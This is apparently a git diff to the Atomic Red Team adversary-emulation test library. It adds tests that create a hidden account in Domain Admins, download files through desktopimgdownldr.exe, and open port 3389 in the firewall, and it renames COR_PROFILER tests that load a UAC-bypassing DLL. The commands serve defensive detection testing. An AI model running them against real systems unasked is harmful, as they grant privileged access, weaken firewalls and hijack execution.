  - description: |
      NMap must be installed
-    prereq_command: 'if (cmd /c nmap 2>nul) {exit 0} else {exit 1}'
+    prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
    get_prereq_command: |
      Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
      Start-Process $env:temp\nmap-7.80-setup.exe /S
@@ -6,6 +6,8 @@

 - [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)

+- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate)
+

 <br/>

@@ -45,4 +47,81 @@ foreach($member in $fmm) {



+<br/>
+<br/>
+
+## Atomic Test #2 - Domain Account and Group Manipulate
+Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 
+
+The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
+you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to 
+create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
+and is unlikely to work with Powershell Core (untested).
+
+If you consider running this test against a production Active Directory, the good practise is to create a dedicated
+service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
+as group manager of the target group.
+
+Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-|
+| group | Name of the group to alter | String | Domain Admins|
+| create_args | Additional string appended to New-ADUser call | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$x = Get-Random -Minimum 2 -Maximum 99
+$y = Get-Random -Minimum 2 -Maximum 99
+$z = Get-Random -Minimum 2 -Maximum 99
+$w = Get-Random -Minimum 2 -Maximum 99
+
+Import-Module ActiveDirectory
+$account = "#{account_prefix}-$x$y$z"
+New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+Add-ADGroupMember "#{group}" $account
+```
+
+#### Cleanup Commands:
+```powershell
+Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: PS Module ActiveDirectory
+##### Check Prereq Commands:
+```powershell
+Try {
+    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+    exit 0
+} 
+Catch {
+    exit 1
+} 
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+  Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
 <br/>
@@ -28,3 +28,67 @@ atomic_tests:
    name: powershell
    elevation_required: true

+- name: Domain Account and Group Manipulate
+  auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+  description: |
+    Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 
+    
+    The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
+    you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to 
+    create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
+    and is unlikely to work with Powershell Core (untested).
+
+    If you consider running this test against a production Active Directory, the good practise is to create a dedicated
+    service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
+    as group manager of the target group.
+
+    Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
+  supported_platforms:
+  - windows
+  input_arguments:
+    account_prefix:
+      description: |
+        Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
+        a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.
+      type: String
+      default: atr-
+    group:
+      description: Name of the group to alter
+      type: String
+      default: "Domain Admins"
+    create_args:
+      description: Additional string appended to New-ADUser call 
+      type: String
+      default: ""
+  dependencies:
+  - description: |
+      PS Module ActiveDirectory
+    prereq_command: |
+      Try {
+          Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+          exit 0
+      } 
+      Catch {
+          exit 1
+      }
+    get_prereq_command: |
+      if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+        Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+      } else {
+        Install-WindowsFeature RSAT-AD-PowerShell
+      }
+  executor:
+    command: |
+      $x = Get-Random -Minimum 2 -Maximum 99
+      $y = Get-Random -Minimum 2 -Maximum 99
+      $z = Get-Random -Minimum 2 -Maximum 99
+      $w = Get-Random -Minimum 2 -Maximum 99
+
+      Import-Module ActiveDirectory
+      $account = "#{account_prefix}-$x$y$z"
+      New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
+      Add-ADGroupMember "#{group}" $account
+    cleanup_command: |
+      Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
+    name: powershell
+
@@ -16,6 +16,8 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter

 - [Atomic Test #3 - Persist, Download, & Execute](#atomic-test-3---persist-download--execute)

+- [Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd)](#atomic-test-4---bits-download-using-destktopimgdownldrexe-cmd)
+

 <br/>

@@ -130,4 +132,43 @@ del #{local_file} >nul 2>&1



+<br/>
+<br/>
+
+## Atomic Test #4 - Bits download using destktopimgdownldr.exe (cmd)
+This test simulates using destopimgdwnldr.exe to download a malicious file
+instead of a desktop or lockscreen background img. The process that actually makes 
+the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) 
+and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
+| download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:&#92;Windows&#92;Temp|
+| cleanup_path | path to delete file as part of cleanup_command | path | C:&#92;Windows&#92;Temp&#92;Personalization&#92;LockScreenImage|
+| cleanup_file | file to remove as part of cleanup_command | string | *.md|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
+```
+
+#### Cleanup Commands:
+```cmd
+del #{cleanup_path}\#{cleanup_file}
+```
+
+
+
+
+
 <br/>
@@ -82,3 +82,35 @@ atomic_tests:
    cleanup_command: |
      del #{local_file} >nul 2>&1
    name: command_prompt
+- name: Bits download using destktopimgdownldr.exe (cmd)
+  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
+  description: |
+    This test simulates using destopimgdwnldr.exe to download a malicious file
+    instead of a desktop or lockscreen background img. The process that actually makes 
+    the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) 
+    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    download_path:
+      description: Local file path to save downloaded file
+      type: path
+      default: 'SYSTEMROOT=C:\Windows\Temp'
+    cleanup_path:
+      description: path to delete file as part of cleanup_command
+      type: path
+      default: C:\Windows\Temp\Personalization\LockScreenImage
+    cleanup_file:
+      description: file to remove as part of cleanup_command
+      type: string
+      default: "*.md"
+  executor:
+    command: |
+      set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
+    cleanup_command: |
+      del #{cleanup_path}\#{cleanup_file}
+    name: command_prompt
@@ -52,7 +52,7 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| command_to_execute | A command to execute. | Path | C:&#92;Windows&#92;System32&#92;calc.exe|
+| command_to_execute | A command to execute. | Path | %windir%&#92;System32&#92;calc.exe|


 #### Attack Commands: Run with `command_prompt`! 
@@ -60,12 +60,12 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c

 ```cmd
 set comspec=#{command_to_execute}
-cscript manage-bde.wsf
+cscript %windir%\System32\manage-bde.wsf
 ```

 #### Cleanup Commands:
 ```cmd
-set comspec=C:\Windows\System32\cmd.exe
+set comspec=%windir%\System32\cmd.exe
 ```


@@ -27,12 +27,12 @@ atomic_tests:
    command_to_execute:
      description: A command to execute.
      type: Path
-      default: C:\Windows\System32\calc.exe
+      default: '%windir%\System32\calc.exe'
  executor:
    command: |
      set comspec=#{command_to_execute}
-      cscript manage-bde.wsf
+      cscript %windir%\System32\manage-bde.wsf
    cleanup_command: |
-      set comspec=C:\Windows\System32\cmd.exe
+      set comspec=%windir%\System32\cmd.exe
    name: command_prompt

@@ -14,6 +14,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications,

 - [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain)

+- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile)
+

 <br/>

@@ -136,4 +138,37 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp



+<br/>
+<br/>
+
+## Atomic Test #5 - Open a local port through Windows Firewall to any profile
+This test will attempt to open a local port defined by input arguments to any profile
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| local_port | This is the local port you wish to test opening | integer | 3389|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any
+```
+
+#### Cleanup Commands:
+```powershell
+netsh advfirewall firewall delete rule name="Open Port to Any"
+```
+
+
+
+
+
 <br/>
@@ -61,3 +61,18 @@ atomic_tests:
    cleanup_command: netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 >nul 2>&1
    name: command_prompt
    elevation_required: true
+- name: Open a local port through Windows Firewall to any profile
+  auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed
+  description: This test will attempt to open a local port defined by input arguments to any profile
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_port:
+      description: This is the local port you wish to test opening
+      type: integer
+      default: 3389
+  executor:
+    command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any
+    cleanup_command: netsh advfirewall firewall delete rule name="Open Port to Any"
+    name: powershell
+    elevation_required: true
@@ -1,27 +1,31 @@
-# T1546.015 - Component Object Model Hijacking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1546.015)
-<blockquote>Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
+# T1574.012 - COR_PROFILER
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1574.012)
+<blockquote>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)

-Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </blockquote>
+The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</blockquote>

 ## Atomic Tests

- [Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER](#atomic-test-1---com-hijack-leveraging-user-scope-cor_profiler)
+- [Atomic Test #1 - User scope COR_PROFILER](#atomic-test-1---user-scope-cor_profiler)

- [Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER](#atomic-test-2---com-hijack-leveraging-system-scope-cor_profiler)
+- [Atomic Test #2 - System Scope COR_PROFILER](#atomic-test-2---system-scope-cor_profiler)

- [Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER](#atomic-test-3---com-hijack-leveraging-registry-free-process-scope-cor_profiler)
+- [Atomic Test #3 - Registry-free process scope COR_PROFILER](#atomic-test-3---registry-free-process-scope-cor_profiler)


 <br/>

-## Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
+## Atomic Test #1 - User scope COR_PROFILER
 Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
+The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
 Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
 If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
 the notepad process will not execute with high integrity.

+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
 **Supported Platforms:** Windows


@@ -30,7 +34,7 @@ the notepad process will not execute with high integrity.
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1546.015&#92;bin&#92;T1546.015x64.dll|
+| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
 | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|


@@ -66,7 +70,7 @@ if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
 ```


@@ -75,12 +79,14 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 <br/>
 <br/>

-## Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
+## Atomic Test #2 - System Scope COR_PROFILER
 Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
 level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
 still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.

+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
 **Supported Platforms:** Windows


@@ -89,7 +95,7 @@ still execute each time the CLR is loaded by a process, however, the notepad pro
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1546.015&#92;bin&#92;T1546.015x64.dll|
+| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
 | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|


@@ -121,7 +127,7 @@ if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
 ```


@@ -130,8 +136,10 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 <br/>
 <br/>

-## Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
-Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
+## Atomic Test #3 - Registry-free process scope COR_PROFILER
+Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/

 **Supported Platforms:** Windows

@@ -141,7 +149,7 @@ Creates process scope environment variables to enable a .NET profiler (COR_PROFI
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1546.015&#92;bin&#92;T1546.015x64.dll|
+| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
 | clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|


@@ -173,7 +181,7 @@ if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
 ```


@@ -1,21 +1,23 @@
-attack_technique: T1546.015
-display_name: 'Event Triggered Execution: Component Object Model Hijacking'
+attack_technique: T1574.012
+display_name: 'Hijack Execution Flow: COR_PROFILER'
 atomic_tests:
- name: COM Hijack Leveraging user scope COR_PROFILER
+- name: User scope COR_PROFILER
  auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
  description: |
    Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-    The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
+    The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
    Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
    If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
    the notepad process will not execute with high integrity.
+
+    Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
  supported_platforms:
  - windows
  input_arguments:
    file_name:
      description: unmanaged profiler DLL
      type: Path
-      default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+      default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
    clsid_guid:
      description: custom clsid guid
      type: String
@@ -28,7 +30,7 @@ atomic_tests:
      if (Test-Path #{file_name}) {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
  executor:
    command: |
      Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
@@ -44,20 +46,22 @@ atomic_tests:
      Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
      Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
    name: powershell
- name: COM Hijack Leveraging System Scope COR_PROFILER
+- name: System Scope COR_PROFILER
  auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
  description: |
    Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-    The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+    The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
    level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
    still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+    Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
  supported_platforms:
  - windows
  input_arguments:
    file_name:
      description: unmanaged profiler DLL
      type: Path
-      default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+      default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
    clsid_guid:
      description: custom clsid guid
      type: String
@@ -70,7 +74,7 @@ atomic_tests:
      if (Test-Path #{file_name}) {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
  executor:
    command: |
      Write-Host "Creating system environment variables" -ForegroundColor Cyan
@@ -83,17 +87,19 @@ atomic_tests:
      Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
    name: powershell
    elevation_required: true
- name: COM Hijack Leveraging registry-free process scope COR_PROFILER
+- name: Registry-free process scope COR_PROFILER
  auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
  description: |
-    Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
+    Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+    Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
  supported_platforms:
  - windows
  input_arguments:
    file_name:
      description: unamanged profiler DLL
      type: Path
-      default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
+      default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
    clsid_guid:
      description: custom clsid guid
      type: String
@@ -106,7 +112,7 @@ atomic_tests:
      if (Test-Path #{file_name}) {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
  executor:
    command: |
      $env:COR_ENABLE_PROFILING = 1
@@ -565,3 +565,6 @@ b5656f67-d67f-4de8-8e62-b5581630f528
 1620de42-160a-4fe5-bbaf-d3fef0181ce9
 db020456-125b-4c8b-a4a7-487df8afb5a2
 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
+9636dd6e-7599-40d2-8eee-ac16434f35ed
+afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -3,8 +3,7 @@ layout: default
 ---

 # Contributing to Atomic Red Team
-*NOTE: We have sweet stickers for people who contribute; if you’re interested send a message to 
-gear@redcanary.com with your mailing address*
+*NOTE: An updated version of this contributing reference is found over on the Wiki [here](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) *

 - [Atomic Philosophy](#atomic-philosophy)
 - [How to contribute](#how-to-contribute)